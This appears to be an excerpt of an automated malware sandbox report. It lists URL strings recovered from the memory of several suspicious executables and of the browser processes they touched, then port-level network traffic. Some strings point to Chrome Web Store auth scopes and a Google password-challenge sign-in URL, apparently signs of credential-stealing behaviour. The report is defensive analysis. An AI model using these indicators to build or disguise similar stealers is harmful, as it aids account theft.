Source: t5abhIx.exe, 0000000D.00000003.2162267263.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162403692.0000026D645A1000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js~
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/google
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.comchrome://browser/skin/menu.svgFailed
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/facebook.svgresource://gre/modules/FileUtils.sys.mjsFileUtils_closeAt
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 0000002C.00000002.2682991190.00000144AED30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2681975606.00000144AEC10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jscolor-mix(in
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helpthe
Source: firefox.exe, 0000002C.00000002.2767048406.00000144B02A3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 0000002C.00000002.2770184103.00000144B0378000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causeshttps://support.mozilla.org
Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/website-translationresource://gre/modules/ContentPrefServiceChild.sys
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.com
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000014.00000003.3074284180.000000000D47A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com//C
Source: explorer.exe, 00000014.00000000.2218023327.0000000009734000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/bat
Source: explorer.exe, 00000014.00000003.3074284180.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2222172086.000000000D1D7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com576
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2642733104.00000144ACE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E3A000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000452F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: dwVrTdy.exe, 00000009.00000003.2033916766.000001B9CE439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.c)
Source: t5abhIx.exe, 0000000D.00000003.2162651119.0000026D6459B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: dwVrTdy.exe, 0000000A.00000003.2051032526.000001CDE2B10000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051058221.000001CDE2B15000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051187960.000001CDE2B20000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051091219.000001CDE2B1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/2$(
Source: dwVrTdy.exe, 0000000A.00000003.2051291870.000001CDE2B13000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051163209.000001CDE2B10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/=
Source: AzVRM7c.exe, 0000000B.00000003.2097250359.000002E277431000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097752416.000002E27742C000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097624301.000002E27742A000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097348132.000002E277429000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097888350.000002E277438000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097183665.000002E277423000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097967560.000002E277446000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097821581.000002E277435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/cjhd
Source: t5abhIx.exe, 0000000D.00000003.2162231625.0000026D645A4000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D645A5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162982228.0000026D645BE000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162763970.0000026D645B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/cjhdj
Source: firefox.exe, 0000002C.00000002.2811181588.00000144B4D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: dwVrTdy.exe, 00000009.00000003.2034061867.000001B9CE447000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE432000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/earch
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000452F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: AzVRM7c.exe, 0000000B.00000003.2098977782.000002E27741B000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097400296.000002E27741B000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097224191.000002E277417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/l3
Source: t5abhIx.exe, 0000000D.00000003.2162878766.0000026D645A9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162231625.0000026D645A4000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D645A5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162805710.0000026D645A5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/m
Source: dwVrTdy.exe, 0000000A.00000003.2051453805.000001CDE2B21000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051426857.000001CDE2B21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/om/
Source: dwVrTdy.exe, 00000009.00000003.2034061867.000001B9CE447000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034164180.000001B9CE44A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2033786317.000001B9CE44E000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2033639099.000001B9CE443000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034237403.000001B9CE453000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034309451.000001B9CE464000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/pleb
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeService
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2642733104.00000144ACE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/searchLOAD_ANONYMOUS_ALLOW_CLIENT_CERTapp-background-update-offgetElementForA
Source: t5abhIx.exe, 0000000D.00000003.2162267263.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162445204.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D6459B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/t
Source: dwVrTdy.exe, 0000000A.00000003.2051130043.000001CDE2B2A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051091219.000001CDE2B1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/u8
Source: dwVrTdy.exe, 00000009.00000003.2033916766.000001B9CE439000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2033727970.000001B9CE435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/x
Source: t5abhIx.exe, 0000000D.00000003.2162763970.0000026D645B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: t5abhIx.exe, 0000000D.00000003.2162763970.0000026D645B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: AzVRM7c.exe, 0000000B.00000003.2097752416.000002E27742C000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097624301.000002E27742A000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097348132.000002E277429000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097888350.000002E277438000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097967560.000002E277446000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2099369210.000002E277450000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097821581.000002E277435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore(
Source: AzVRM7c.exe, 0000000B.00000003.2097183665.000002E277423000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097888350.000002E27742F000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162267263.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162878766.0000026D645A2000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162403692.0000026D645A1000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162445204.0000026D645A2000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D645A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: dwVrTdy.exe, 0000000A.00000003.2051291870.000001CDE2B13000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051163209.000001CDE2B10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly2
Source: t5abhIx.exe, 0000000D.00000003.2162267263.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162878766.0000026D645A2000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162403692.0000026D645A1000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162445204.0000026D645A2000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D645A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly477BB445q
Source: AzVRM7c.exe, 0000000B.00000003.2097752416.000002E27742C000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097624301.000002E27742A000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097348132.000002E277429000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097888350.000002E27742F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly?
Source: dwVrTdy.exe, 00000009.00000003.2034412080.000001B9CE46E000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034061867.000001B9CE447000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034164180.000001B9CE44A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034237403.000001B9CE453000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034309451.000001B9CE464000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyJEv)-
Source: t5abhIx.exe, 0000000D.00000003.2162267263.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162403692.0000026D645A1000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlym
Source: t5abhIx.exe, 0000000D.00000003.2162231625.0000026D645A4000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D645A5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162982228.0000026D645BE000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162763970.0000026D645B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstoreE
Source: dwVrTdy.exe, 0000000A.00000003.2051354898.000001CDE2B24000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051570715.000001CDE2B4A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051453805.000001CDE2B29000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051513389.000001CDE2B2F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051545342.000001CDE2B49000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051621385.000001CDE2B4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstoreeU
Source: AzVRM7c.exe, 0000000B.00000003.2097250359.000002E277431000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097348132.000002E277429000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097183665.000002E277423000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstorel
Source: t5abhIx.exe, 0000000D.00000003.2162763970.0000026D645B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: dwVrTdy.exe, 00000009.00000003.2033786317.000001B9CE44E000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2033639099.000001B9CE443000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierraZY
Source: t5abhIx.exe, 0000000D.00000003.2162763970.0000026D645B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: dwVrTdy.exe, 00000009.00000003.2034061867.000001B9CE447000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034164180.000001B9CE44A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034237403.000001B9CE453000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034309451.000001B9CE464000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierrasandboxzY
Source: firefox.exe, 0000002C.00000002.2811181588.00000144B4D81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2610517942.00000144A9D3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000002C.00000002.2836484023.000012B890804000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/health/wellness/7-secrets-to-a-happy-old-age-backed-by-science/ss-AA1hwpvW
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/companies/legacy-park-auction-canceled-liquidation-proposed-here-s-w
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/one-dead-several-wounded-after-drive-by-shootings-in-south-la/a
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/opinion/decline-of-decorum-21-essential-manners-today-s-parents-fail-
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/california-workers-will-get-five-sick-days-instead-of-three-
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controv
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000002C.00000002.2836484023.000012B890804000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.tsn.ca
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 0000002C.00000002.2808634681.00000144B4C73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2697661848.00000144AF32A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2833775126.000004B22E200000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000002C.00000002.2833775126.000004B22E200000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com.
Source: firefox.exe, 0000002C.00000002.2697661848.00000144AF351000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/
Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account
Source: firefox.exe, 0000002C.00000002.2587816495.000001449EB4C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000002B.00000002.2484555408.000002392C0F9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2587816495.000001449EB4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000002C.00000002.2587816495.000001449EB4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd6
Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdCheckerService:#upda
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdmoz-extension://6d7f
Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/accounteEditorEnableWrapHackMaskshowRemoteTabsFromFxaMenusendTabConfiguredAndLoa

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 50305 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50305
